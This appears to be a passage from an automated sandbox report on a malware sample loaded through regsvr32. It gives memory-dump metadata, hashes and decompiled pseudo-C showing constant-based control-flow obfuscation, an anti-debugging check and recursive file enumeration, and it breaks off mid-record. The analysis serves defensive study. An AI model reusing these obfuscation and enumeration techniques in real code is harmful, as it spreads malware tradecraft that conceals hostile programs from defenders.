                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: [Vr$\2$]Q+$mmc$mmc$pOx
                                                                                                                • API String ID: 0-1739744460
                                                                                                                • Opcode ID: 24f686123271707370cffbe9e40e6fde8167f209c3314add08f5cb8f9cc39fcd
                                                                                                                • Instruction ID: 9e113bb1fc1c38a01323991614556109f699891c08a0dd93148c7f7f67bd7f6e
                                                                                                                • Opcode Fuzzy Hash: 24f686123271707370cffbe9e40e6fde8167f209c3314add08f5cb8f9cc39fcd
                                                                                                                • Instruction Fuzzy Hash: 7C9197B4008341CBC36ACF65C596A2BBBE1EBE8308F504A1EF58696660C770DE49CF47
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 95%
                                                                                                                			E001A3F5A(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                				char _v128;
                                                                                                                				char _v132;
                                                                                                                				signed int _v136;
                                                                                                                				signed int _v140;
                                                                                                                				signed int _v144;
                                                                                                                				signed int _v148;
                                                                                                                				signed int _v152;
                                                                                                                				signed int _v156;
                                                                                                                				signed int _v160;
                                                                                                                				signed int _v164;
                                                                                                                				signed int _v168;
                                                                                                                				signed int _v172;
                                                                                                                				signed int _v176;
                                                                                                                				signed int _v180;
                                                                                                                				signed int _v184;
                                                                                                                				signed int _v188;
                                                                                                                				signed int _v192;
                                                                                                                				signed int _v196;
                                                                                                                				void* _t141;
                                                                                                                				signed int _t150;
                                                                                                                				void* _t153;
                                                                                                                				signed int _t160;
                                                                                                                				signed int _t161;
                                                                                                                				char* _t162;
                                                                                                                				void* _t178;
                                                                                                                				void* _t179;
                                                                                                                				signed int* _t183;
                                                                                                                
                                                                                                                				_push(_a8);
                                                                                                                				_t178 = __ecx;
                                                                                                                				_push(_a4);
                                                                                                                				_push(__edx);
                                                                                                                				_push(__ecx);
                                                                                                                				E001AC98A(_t141);
                                                                                                                				_v156 = 0xe6b872;
                                                                                                                				_t183 =  &(( &_v196)[4]);
                                                                                                                				_v156 = _v156 + 0xffff1908;
                                                                                                                				_v156 = _v156 ^ 0x00ef584d;
                                                                                                                				_t179 = 0x997ece5;
                                                                                                                				_v168 = 0x760666;
                                                                                                                				_t160 = 0x3e;
                                                                                                                				_v168 = _v168 * 0x7f;
                                                                                                                				_v168 = _v168 ^ 0x7df5bd18;
                                                                                                                				_v168 = _v168 ^ 0x477441ed;
                                                                                                                				_v188 = 0xea423a;
                                                                                                                				_v188 = _v188 >> 0xe;
                                                                                                                				_v188 = _v188 >> 0xf;
                                                                                                                				_v188 = _v188 >> 7;
                                                                                                                				_v188 = _v188 ^ 0x0004e55a;
                                                                                                                				_v148 = 0x5102b;
                                                                                                                				_v148 = _v148 | 0x64f23aa1;
                                                                                                                				_v148 = _v148 ^ 0x64f27935;
                                                                                                                				_v172 = 0x2b9539;
                                                                                                                				_v172 = _v172 | 0x56d945b3;
                                                                                                                				_v172 = _v172 ^ 0x081559fa;
                                                                                                                				_v172 = _v172 ^ 0x5ee277f8;
                                                                                                                				_v136 = 0x799aa8;
                                                                                                                				_v136 = _v136 | 0xd35f2ef9;
                                                                                                                				_v136 = _v136 ^ 0xd3786496;
                                                                                                                				_v164 = 0x266e74;
                                                                                                                				_v164 = _v164 / _t160;
                                                                                                                				_t161 = 0x4a;
                                                                                                                				_v164 = _v164 * 0x43;
                                                                                                                				_v164 = _v164 ^ 0x002d52c5;
                                                                                                                				_v192 = 0x2eed33;
                                                                                                                				_v192 = _v192 + 0xffff2284;
                                                                                                                				_v192 = _v192 | 0x099d84b3;
                                                                                                                				_v192 = _v192 << 0xd;
                                                                                                                				_v192 = _v192 ^ 0xf1f5a48a;
                                                                                                                				_v140 = 0x8fb330;
                                                                                                                				_v140 = _v140 + 0xffffd26f;
                                                                                                                				_v140 = _v140 ^ 0x0084292b;
                                                                                                                				_v196 = 0x4ecb20;
                                                                                                                				_v196 = _v196 + 0xffffc02f;
                                                                                                                				_v196 = _v196 | 0x332f1428;
                                                                                                                				_v196 = _v196 + 0xffffe6b3;
                                                                                                                				_v196 = _v196 ^ 0x336f8650;
                                                                                                                				_v180 = 0x124f00;
                                                                                                                				_v180 = _v180 * 0x48;
                                                                                                                				_v180 = _v180 | 0x3fc9aff3;
                                                                                                                				_v180 = _v180 ^ 0x3feb33fa;
                                                                                                                				_v176 = 0x12e52c;
                                                                                                                				_v176 = _v176 / _t161;
                                                                                                                				_v176 = _v176 >> 8;
                                                                                                                				_v176 = _v176 ^ 0x00083e66;
                                                                                                                				_v144 = 0xc0b5b7;
                                                                                                                				_v144 = _v144 + 0x823c;
                                                                                                                				_v144 = _v144 ^ 0x00cfdec5;
                                                                                                                				_v152 = 0xd5e5c;
                                                                                                                				_v152 = _v152 << 7;
                                                                                                                				_v152 = _v152 ^ 0x06ad322c;
                                                                                                                				_v184 = 0x161ac4;
                                                                                                                				_v184 = _v184 + 0x557f;
                                                                                                                				_v184 = _v184 + 0x8493;
                                                                                                                				_v184 = _v184 | 0x1ca1de3a;
                                                                                                                				_v184 = _v184 ^ 0x1cb6deb9;
                                                                                                                				_v160 = 0xc049f6;
                                                                                                                				_t150 = _v160 * 0x45;
                                                                                                                				_v160 = _t150;
                                                                                                                				_v160 = _v160 >> 3;
                                                                                                                				_v160 = _v160 ^ 0x067dbbb6;
                                                                                                                				do {
                                                                                                                					while(_t179 != 0x2e01a8) {
                                                                                                                						if(_t179 == 0xbfec75) {
                                                                                                                							_v132 = 0x80;
                                                                                                                							_t150 = E001A3DFB(_v156, _v168, _v188, _v148,  &_v132,  &_v128);
                                                                                                                							_t183 =  &(_t183[4]);
                                                                                                                							_t179 = 0x2e01a8;
                                                                                                                							continue;
                                                                                                                						}
                                                                                                                						if(_t179 == 0x997ece5) {
                                                                                                                							_t179 = 0xbfec75;
                                                                                                                							continue;
                                                                                                                						}
                                                                                                                						_t189 = _t179 - 0xd1f2ddd;
                                                                                                                						if(_t179 != 0xd1f2ddd) {
                                                                                                                							goto L19;
                                                                                                                						}
                                                                                                                						_push(_v136);
                                                                                                                						_t153 = E001AE4F5(_v172, 0x1a1680, _t189);
                                                                                                                						E001A7F31(_v192, _v140, _v196, _v180,  &_v128, _v164, E001B3094(_t189), _v176, _t178);
                                                                                                                						return E001BF94B(_t153, _v144, _v152, _v184, _v160);
                                                                                                                					}
                                                                                                                					__eflags = _v128;
                                                                                                                					_t162 =  &_v128;
                                                                                                                					if(_v128 == 0) {
                                                                                                                						L18:
                                                                                                                						_t179 = 0xd1f2ddd;
                                                                                                                						goto L19;
                                                                                                                					} else {
                                                                                                                						goto L10;
                                                                                                                					}
                                                                                                                					do {
                                                                                                                						L10:
                                                                                                                						_t150 =  *_t162;
                                                                                                                						__eflags = _t150 - 0x30;
                                                                                                                						if(_t150 < 0x30) {
                                                                                                                							L12:
                                                                                                                							__eflags = _t150 - 0x61;
                                                                                                                							if(_t150 < 0x61) {
                                                                                                                								L14:
                                                                                                                								__eflags = _t150 - 0x41;
                                                                                                                								if(_t150 < 0x41) {
                                                                                                                									L16:
                                                                                                                									 *_t162 = 0x58;
                                                                                                                									goto L17;
                                                                                                                								}
                                                                                                                								__eflags = _t150 - 0x5a;
                                                                                                                								if(_t150 <= 0x5a) {
                                                                                                                									goto L17;
                                                                                                                								}
                                                                                                                								goto L16;
                                                                                                                							}
                                                                                                                							__eflags = _t150 - 0x7a;
                                                                                                                							if(_t150 <= 0x7a) {
                                                                                                                								goto L17;
                                                                                                                							}
                                                                                                                							goto L14;
                                                                                                                						}
                                                                                                                						__eflags = _t150 - 0x39;
                                                                                                                						if(_t150 <= 0x39) {
                                                                                                                							goto L17;
                                                                                                                						}
                                                                                                                						goto L12;
                                                                                                                						L17:
                                                                                                                						_t162 = _t162 + 1;
                                                                                                                						__eflags =  *_t162;
                                                                                                                					} while ( *_t162 != 0);
                                                                                                                					goto L18;
                                                                                                                					L19:
                                                                                                                					__eflags = _t179 - 0x1c39118;
                                                                                                                				} while (__eflags != 0);
                                                                                                                				return _t150;
                                                                                                                			}


                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 3.$:B$MX$\^$tn&$AtG
                                                                                                                • API String ID: 0-4051168333
                                                                                                                • Opcode ID: 011212951ef11eaeda251e0241905eae9a10fdc0ac814704e37244f25ded758a
                                                                                                                • Instruction ID: 7091706f449bdad6f96f76cf592d5387d50dd1070154cd50bfcd9887d5d7aab1
                                                                                                                • Opcode Fuzzy Hash: 011212951ef11eaeda251e0241905eae9a10fdc0ac814704e37244f25ded758a
                                                                                                                • Instruction Fuzzy Hash: 54815275409380AFC358CE25DA8A65BBBE0FBD6708F405A1DF59596260C3B18A0A8F83
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 85%
                                                                                                                			E1003B437(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
                                                                                                                				intOrPtr _v0;
                                                                                                                				void* _v804;
                                                                                                                				intOrPtr _v808;
                                                                                                                				intOrPtr _v812;
                                                                                                                				intOrPtr _t6;
                                                                                                                				intOrPtr _t11;
                                                                                                                				intOrPtr _t12;
                                                                                                                				intOrPtr _t13;
                                                                                                                				long _t17;
                                                                                                                				intOrPtr _t21;
                                                                                                                				intOrPtr _t22;
                                                                                                                				intOrPtr _t25;
                                                                                                                				intOrPtr _t26;
                                                                                                                				intOrPtr _t27;
                                                                                                                				intOrPtr* _t31;
                                                                                                                				void* _t34;
                                                                                                                
                                                                                                                				_t27 = __esi;
                                                                                                                				_t26 = __edi;
                                                                                                                				_t25 = __edx;
                                                                                                                				_t22 = __ecx;
                                                                                                                				_t21 = __ebx;
                                                                                                                				_t6 = __eax;
                                                                                                                				_t34 = _t22 -  *0x1006dbdc; // 0xdf7c0cda
                                                                                                                				if(_t34 == 0) {
                                                                                                                					asm("repe ret");
                                                                                                                				}
                                                                                                                				 *0x100710e8 = _t6;
                                                                                                                				 *0x100710e4 = _t22;
                                                                                                                				 *0x100710e0 = _t25;
                                                                                                                				 *0x100710dc = _t21;
                                                                                                                				 *0x100710d8 = _t27;
                                                                                                                				 *0x100710d4 = _t26;
                                                                                                                				 *0x10071100 = ss;
                                                                                                                				 *0x100710f4 = cs;
                                                                                                                				 *0x100710d0 = ds;
                                                                                                                				 *0x100710cc = es;
                                                                                                                				 *0x100710c8 = fs;
                                                                                                                				 *0x100710c4 = gs;
                                                                                                                				asm("pushfd");
                                                                                                                				_pop( *0x100710f8);
                                                                                                                				 *0x100710ec =  *_t31;
                                                                                                                				 *0x100710f0 = _v0;
                                                                                                                				 *0x100710fc =  &_a4;
                                                                                                                				 *0x10071038 = 0x10001;
                                                                                                                				_t11 =  *0x100710f0; // 0x0
                                                                                                                				 *0x10070fec = _t11;
                                                                                                                				 *0x10070fe0 = 0xc0000409;
                                                                                                                				 *0x10070fe4 = 1;
                                                                                                                				_t12 =  *0x1006dbdc; // 0xdf7c0cda
                                                                                                                				_v812 = _t12;
                                                                                                                				_t13 =  *0x1006dbe0; // 0x2083f325
                                                                                                                				_v808 = _t13;
                                                                                                                				 *0x10071030 = IsDebuggerPresent();
                                                                                                                				_push(1);
                                                                                                                				E1004BA27(_t14);
                                                                                                                				SetUnhandledExceptionFilter(0);
                                                                                                                				_t17 = UnhandledExceptionFilter(0x1005e0b0);
                                                                                                                				if( *0x10071030 == 0) {
                                                                                                                					_push(1);
                                                                                                                					E1004BA27(_t17);
                                                                                                                				}
                                                                                                                				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                                                                                			}




















                                                                                                                APIs
                                                                                                                • IsDebuggerPresent.KERNEL32 ref: 10042FE5
                                                                                                                • SetUnhandledExceptionFilter.KERNEL32 ref: 10042FFA
                                                                                                                • UnhandledExceptionFilter.KERNEL32(1005E0B0), ref: 10043005
                                                                                                                • GetCurrentProcess.KERNEL32(C0000409), ref: 10043021
                                                                                                                • TerminateProcess.KERNEL32(00000000), ref: 10043028
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                • String ID:
                                                                                                                • API String ID: 2579439406-0
                                                                                                                • Opcode ID: 8abd97846ce0fdaa6b72251a45df092e791fca62a4a0909e4d71e8bdea95afb0
                                                                                                                • Instruction ID: 4840f814a5ffd126f34e836e92ef276f075f750e7d7c0fa29799507bff115c89
                                                                                                                • Opcode Fuzzy Hash: 8abd97846ce0fdaa6b72251a45df092e791fca62a4a0909e4d71e8bdea95afb0
                                                                                                                • Instruction Fuzzy Hash: 6D2105789102A0CFE310DF69DCC56C43BB6FB08341F50526AE588A76A1E7F859C58F95
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 81%
                                                                                                                			E001B7098(signed int __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				signed int _v20;
                                                                                                                				signed int _v24;
                                                                                                                				signed int _v28;
                                                                                                                				signed int _v32;
                                                                                                                				signed int _v36;
                                                                                                                				signed int _v40;
                                                                                                                				signed int _v44;
                                                                                                                				signed int _v48;
                                                                                                                				signed int _v52;
                                                                                                                				signed int _v56;
                                                                                                                				signed int _v60;
                                                                                                                				signed int _v64;
                                                                                                                				signed int _v68;
                                                                                                                				signed int _v72;
                                                                                                                				signed int _v76;
                                                                                                                				signed int _v80;
                                                                                                                				signed int _v84;
                                                                                                                				signed int _v88;
                                                                                                                				signed int _v92;
                                                                                                                				signed int _v96;
                                                                                                                				signed int _v100;
                                                                                                                				signed int _v104;
                                                                                                                				signed int _v108;
                                                                                                                				signed int _v112;
                                                                                                                				signed int _v116;
                                                                                                                				signed int _v120;
                                                                                                                				signed int _v124;
                                                                                                                				signed int _v128;
                                                                                                                				signed int _v132;
                                                                                                                				signed int _v136;
                                                                                                                				signed int _v140;
                                                                                                                				signed int _v144;
                                                                                                                				signed int _v148;
                                                                                                                				signed int _v152;
                                                                                                                				signed int _v156;
                                                                                                                				signed int _v160;
                                                                                                                				intOrPtr _v164;
                                                                                                                				intOrPtr _v196;
                                                                                                                				char _v212;
                                                                                                                				short _v756;
                                                                                                                				short _v758;
                                                                                                                				intOrPtr _v760;
                                                                                                                				signed int _v804;
                                                                                                                				char _v1324;
                                                                                                                				char _v1844;
                                                                                                                				void* __ecx;
                                                                                                                				signed int _t392;
                                                                                                                				signed int _t395;
                                                                                                                				intOrPtr _t405;
                                                                                                                				void* _t407;
                                                                                                                				signed int _t413;
                                                                                                                				void* _t448;
                                                                                                                				signed int _t460;
                                                                                                                				signed int _t461;
                                                                                                                				signed int _t462;
                                                                                                                				signed int _t463;
                                                                                                                				signed int _t464;
                                                                                                                				signed int _t465;
                                                                                                                				signed int _t466;
                                                                                                                				signed int _t467;
                                                                                                                				signed int _t468;
                                                                                                                				signed int _t469;
                                                                                                                				void* _t472;
                                                                                                                				void* _t473;
                                                                                                                
                                                                                                                				_t405 = _a4;
                                                                                                                				_push(_a24);
                                                                                                                				_v156 = __edx;
                                                                                                                				_push(_a20);
                                                                                                                				_push(_a16);
                                                                                                                				_push(_a12);
                                                                                                                				_push(_a8);
                                                                                                                				_push(_t405);
                                                                                                                				_push(__edx);
                                                                                                                				E001AC98A(__edx);
                                                                                                                				_v160 = _v160 & 0x00000000;
                                                                                                                				_t473 = _t472 + 0x20;
                                                                                                                				_v164 = 0xe9cde5;
                                                                                                                				_v152 = 0xe1ae83;
                                                                                                                				_t407 = 0x2bd40a0;
                                                                                                                				_v152 = _v152 ^ 0xd60f8d8c;
                                                                                                                				_v152 = _v152 ^ 0xd6ee231f;
                                                                                                                				_v132 = 0xd9c22f;
                                                                                                                				_t460 = 0x57;
                                                                                                                				_v132 = _v132 * 0x4c;
                                                                                                                				_v132 = _v132 ^ 0x40aa69c9;
                                                                                                                				_v144 = 0x772f8a;
                                                                                                                				_v144 = _v144 / _t460;
                                                                                                                				_v144 = _v144 ^ 0x0001f636;
                                                                                                                				_v24 = 0x9e03f;
                                                                                                                				_t461 = 0x12;
                                                                                                                				_v24 = _v24 / _t461;
                                                                                                                				_t462 = 0xb;
                                                                                                                				_v24 = _v24 / _t462;
                                                                                                                				_v24 = _v24 | 0x650e5178;
                                                                                                                				_v24 = _v24 ^ 0x650a33e8;
                                                                                                                				_v124 = 0x6eb2de;
                                                                                                                				_v124 = _v124 + 0xffff1123;
                                                                                                                				_v124 = _v124 ^ 0x006ca912;
                                                                                                                				_v32 = 0x942ada;
                                                                                                                				_v32 = _v32 * 0x62;
                                                                                                                				_v32 = _v32 << 1;
                                                                                                                				_v32 = _v32 + 0x76c5;
                                                                                                                				_v32 = _v32 ^ 0x717f66a2;
                                                                                                                				_v56 = 0xd0fbc5;
                                                                                                                				_v56 = _v56 * 0x63;
                                                                                                                				_v56 = _v56 * 0x78;
                                                                                                                				_v56 = _v56 ^ 0xe22d0e94;
                                                                                                                				_v80 = 0x21b0a5;
                                                                                                                				_v80 = _v80 + 0xffff5f41;
                                                                                                                				_v80 = _v80 ^ 0x333fb36a;
                                                                                                                				_v80 = _v80 ^ 0x331549a3;
                                                                                                                				_v64 = 0x5432d9;
                                                                                                                				_v64 = _v64 | 0x7c4df539;
                                                                                                                				_v64 = _v64 >> 0xa;
                                                                                                                				_v64 = _v64 ^ 0x00189496;
                                                                                                                				_v68 = 0xab2afc;
                                                                                                                				_v68 = _v68 * 0x3a;
                                                                                                                				_v68 = _v68 | 0xc3d15b72;
                                                                                                                				_v68 = _v68 ^ 0xe7d66726;
                                                                                                                				_v60 = 0xe64bce;
                                                                                                                				_v60 = _v60 >> 6;
                                                                                                                				_v60 = _v60 + 0xffffe059;
                                                                                                                				_v60 = _v60 ^ 0x000014e2;
                                                                                                                				_v8 = 0xab89de;
                                                                                                                				_v8 = _v8 ^ 0xdadf3d4d;
                                                                                                                				_v8 = _v8 << 1;
                                                                                                                				_v8 = _v8 ^ 0xfe0c27c5;
                                                                                                                				_v8 = _v8 ^ 0x4aed6090;
                                                                                                                				_v92 = 0x4ab211;
                                                                                                                				_v92 = _v92 << 2;
                                                                                                                				_v92 = _v92 ^ 0x012e05c3;
                                                                                                                				_v112 = 0xfa2a6c;
                                                                                                                				_t463 = 0x52;
                                                                                                                				_v112 = _v112 / _t463;
                                                                                                                				_v112 = _v112 ^ 0x0000aa3c;
                                                                                                                				_v104 = 0x3b8906;
                                                                                                                				_v104 = _v104 ^ 0x968d0d7c;
                                                                                                                				_v104 = _v104 ^ 0x96b90388;
                                                                                                                				_v96 = 0x3894d1;
                                                                                                                				_v96 = _v96 + 0xffff2d0b;
                                                                                                                				_v96 = _v96 ^ 0x003fc317;
                                                                                                                				_v88 = 0x7cf997;
                                                                                                                				_v88 = _v88 + 0xffff8033;
                                                                                                                				_v88 = _v88 ^ 0x0070ae74;
                                                                                                                				_v48 = 0xd70609;
                                                                                                                				_v48 = _v48 << 0xe;
                                                                                                                				_v48 = _v48 + 0x2f9a;
                                                                                                                				_v48 = _v48 ^ 0x7a85bebd;
                                                                                                                				_v48 = _v48 ^ 0xbb0867d7;
                                                                                                                				_v16 = 0x934351;
                                                                                                                				_v16 = _v16 << 0xa;
                                                                                                                				_v16 = _v16 + 0x16ff;
                                                                                                                				_v16 = _v16 + 0x3792;
                                                                                                                				_v16 = _v16 ^ 0x4d0de3c9;
                                                                                                                				_v40 = 0xed9c1a;
                                                                                                                				_v40 = _v40 << 5;
                                                                                                                				_v40 = _v40 >> 6;
                                                                                                                				_v40 = _v40 | 0xb8c33e11;
                                                                                                                				_v40 = _v40 ^ 0xb8f7351a;
                                                                                                                				_v52 = 0xe93acd;
                                                                                                                				_v52 = _v52 << 6;
                                                                                                                				_v52 = _v52 >> 6;
                                                                                                                				_v52 = _v52 ^ 0x00e2edc9;
                                                                                                                				_v36 = 0xf21b52;
                                                                                                                				_t464 = 0x49;
                                                                                                                				_v36 = _v36 * 0x53;
                                                                                                                				_v36 = _v36 + 0x1375;
                                                                                                                				_v36 = _v36 ^ 0xfc2b51b1;
                                                                                                                				_v36 = _v36 ^ 0xb2507db2;
                                                                                                                				_v140 = 0x565459;
                                                                                                                				_v140 = _v140 * 0x60;
                                                                                                                				_v140 = _v140 ^ 0x205fd495;
                                                                                                                				_v100 = 0xbc592d;
                                                                                                                				_v100 = _v100 ^ 0x2c73af3d;
                                                                                                                				_v100 = _v100 ^ 0x2cc7dac8;
                                                                                                                				_v28 = 0x20667c;
                                                                                                                				_v28 = _v28 + 0xffff8dc2;
                                                                                                                				_v28 = _v28 * 0x69;
                                                                                                                				_v28 = _v28 / _t464;
                                                                                                                				_v28 = _v28 ^ 0x002d4b1e;
                                                                                                                				_v116 = 0xf87664;
                                                                                                                				_v116 = _v116 >> 4;
                                                                                                                				_v116 = _v116 ^ 0x00040105;
                                                                                                                				_v148 = 0x862c06;
                                                                                                                				_v148 = _v148 * 0x1b;
                                                                                                                				_v148 = _v148 ^ 0x0e220f18;
                                                                                                                				_v108 = 0x5b01b1;
                                                                                                                				_v108 = _v108 << 3;
                                                                                                                				_v108 = _v108 ^ 0x02d2fc58;
                                                                                                                				_v20 = 0xc0bc00;
                                                                                                                				_v20 = _v20 + 0xffff673e;
                                                                                                                				_v20 = _v20 ^ 0x9f38b281;
                                                                                                                				_v20 = _v20 | 0x7195642b;
                                                                                                                				_v20 = _v20 ^ 0xfff305fd;
                                                                                                                				_v72 = 0x5a25f7;
                                                                                                                				_v72 = _v72 + 0xffff806b;
                                                                                                                				_t465 = 9;
                                                                                                                				_t459 = _v156;
                                                                                                                				_v72 = _v72 * 6;
                                                                                                                				_v72 = _v72 ^ 0x02144f11;
                                                                                                                				_v44 = 0x5a5457;
                                                                                                                				_v44 = _v44 + 0xffff95a6;
                                                                                                                				_v44 = _v44 / _t465;
                                                                                                                				_t466 = 0x14;
                                                                                                                				_v44 = _v44 * 0x53;
                                                                                                                				_v44 = _v44 ^ 0x03367d00;
                                                                                                                				_v136 = 0xf64c3a;
                                                                                                                				_v136 = _v136 / _t466;
                                                                                                                				_v136 = _v136 ^ 0x0002671c;
                                                                                                                				_v12 = 0x3757cd;
                                                                                                                				_t467 = 0x22;
                                                                                                                				_v12 = _v12 / _t467;
                                                                                                                				_v12 = _v12 + 0xd6dd;
                                                                                                                				_v12 = _v12 << 1;
                                                                                                                				_v12 = _v12 ^ 0x0007fcf5;
                                                                                                                				_v120 = 0xe25aef;
                                                                                                                				_v120 = _v120 << 3;
                                                                                                                				_v120 = _v120 ^ 0x071f129a;
                                                                                                                				_v84 = 0xe470cc;
                                                                                                                				_v84 = _v84 ^ 0x42708a71;
                                                                                                                				_t468 = 0x5e;
                                                                                                                				_v84 = _v84 / _t468;
                                                                                                                				_v84 = _v84 ^ 0x00bf574f;
                                                                                                                				_v128 = 0x9e9e4f;
                                                                                                                				_t469 = 0x19;
                                                                                                                				_v128 = _v128 * 0x57;
                                                                                                                				_v128 = _v128 ^ 0x35e08318;
                                                                                                                				_v76 = 0xebfafe;
                                                                                                                				_v76 = _v76 + 0xffffdc01;
                                                                                                                				_v76 = _v76 / _t469;
                                                                                                                				_v76 = _v76 ^ 0x000d8556;
                                                                                                                				while(1) {
                                                                                                                					L1:
                                                                                                                					_t448 = 0x2e;
                                                                                                                					L2:
                                                                                                                					while(_t407 != 0x2bd40a0) {
                                                                                                                						if(_t407 == 0x2e0e603) {
                                                                                                                							_t392 = E001AEC5D( &_v804, _v12, _v120, _t459);
                                                                                                                							asm("sbb ecx, ecx");
                                                                                                                							_t413 =  ~_t392 & 0x05acb6ea;
                                                                                                                							L17:
                                                                                                                							_t407 = _t413 + 0x4e7b3c1;
                                                                                                                							while(1) {
                                                                                                                								L1:
                                                                                                                								_t448 = 0x2e;
                                                                                                                								goto L2;
                                                                                                                							}
                                                                                                                						}
                                                                                                                						if(_t407 == 0x4e7b3c1) {
                                                                                                                							return E001A6EB4(_v84, _t459, _v128, _v76);
                                                                                                                						}
                                                                                                                						if(_t407 == 0x8acca3d) {
                                                                                                                							_t395 = E001C27C2(_v112,  &_v804,  &_v1844, _v104, _v96);
                                                                                                                							_t459 = _t395;
                                                                                                                							_t473 = _t473 + 0xc;
                                                                                                                							__eflags = _t395 - 0xffffffff;
                                                                                                                							if(__eflags == 0) {
                                                                                                                								return _t395;
                                                                                                                							}
                                                                                                                							_t407 = 0xa946aab;
                                                                                                                							while(1) {
                                                                                                                								L1:
                                                                                                                								_t448 = 0x2e;
                                                                                                                								goto L2;
                                                                                                                							}
                                                                                                                						}
                                                                                                                						if(_t407 == 0xa338b58) {
                                                                                                                							_push(_v124);
                                                                                                                							_push(0x1a1000);
                                                                                                                							_push(_v24);
                                                                                                                							E001C1C9B(_v32, __eflags, _v56, _t405, E001BF5D9(_v132, _v144, __eflags), _v132, _v80, _v64);
                                                                                                                							_t395 = E001BF94B(_t396, _v68, _v60, _v8, _v92);
                                                                                                                							_t473 = _t473 + 0x30;
                                                                                                                							_t407 = 0x8acca3d;
                                                                                                                							goto L1;
                                                                                                                						}
                                                                                                                						if(_t407 != 0xa946aab) {
                                                                                                                							L23:
                                                                                                                							__eflags = _t407 - 0x341abab;
                                                                                                                							if(__eflags != 0) {
                                                                                                                								continue;
                                                                                                                							}
                                                                                                                							return _t395;
                                                                                                                						}
                                                                                                                						_t395 = _v152;
                                                                                                                						if((_v804 & _t395) == 0) {
                                                                                                                							_t395 = _a8( &_v804,  &_v212);
                                                                                                                							asm("sbb ecx, ecx");
                                                                                                                							_t413 =  ~_t395 & 0xfdf93242;
                                                                                                                							__eflags = _t413;
                                                                                                                							goto L17;
                                                                                                                						}
                                                                                                                						if(_v760 != _t448 || _v758 != 0 && (_v758 != _t448 || _v756 != 0)) {
                                                                                                                							__eflags = _a16;
                                                                                                                							if(__eflags != 0) {
                                                                                                                								_push(_v40);
                                                                                                                								_push(0x1a1040);
                                                                                                                								_push(_v16);
                                                                                                                								E001B8EB3(_t405, __eflags, _v52, _v88, _v36,  &_v1324, _v140, E001BF5D9(_v88, _v48, __eflags), _v100);
                                                                                                                								E001B7098(_v156,  &_v1324, _a8, _v116, _a16, _v148, _v108);
                                                                                                                								_t395 = E001BF94B(_t400, _v20, _v72, _v44, _v136);
                                                                                                                								_t473 = _t473 + 0x4c;
                                                                                                                								_t448 = 0x2e;
                                                                                                                							}
                                                                                                                						}
                                                                                                                						_t407 = 0x2e0e603;
                                                                                                                					}
                                                                                                                					_v196 = _t405;
                                                                                                                					_t407 = 0xa338b58;
                                                                                                                					goto L23;
                                                                                                                				}
                                                                                                                			}


                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: WTZ$YTV$|f $3e$Z
                                                                                                                • API String ID: 0-1675320682
                                                                                                                • Opcode ID: 2da71b13947c65a4c5b28634c232b966d466bff14ba6ba5cab51ae2da56b3518
                                                                                                                • Instruction ID: e5a1f9901b03e53987933ef84d8b1c0fecc09969b06f699c728f2149d3d88380
                                                                                                                • Opcode Fuzzy Hash: 2da71b13947c65a4c5b28634c232b966d466bff14ba6ba5cab51ae2da56b3518
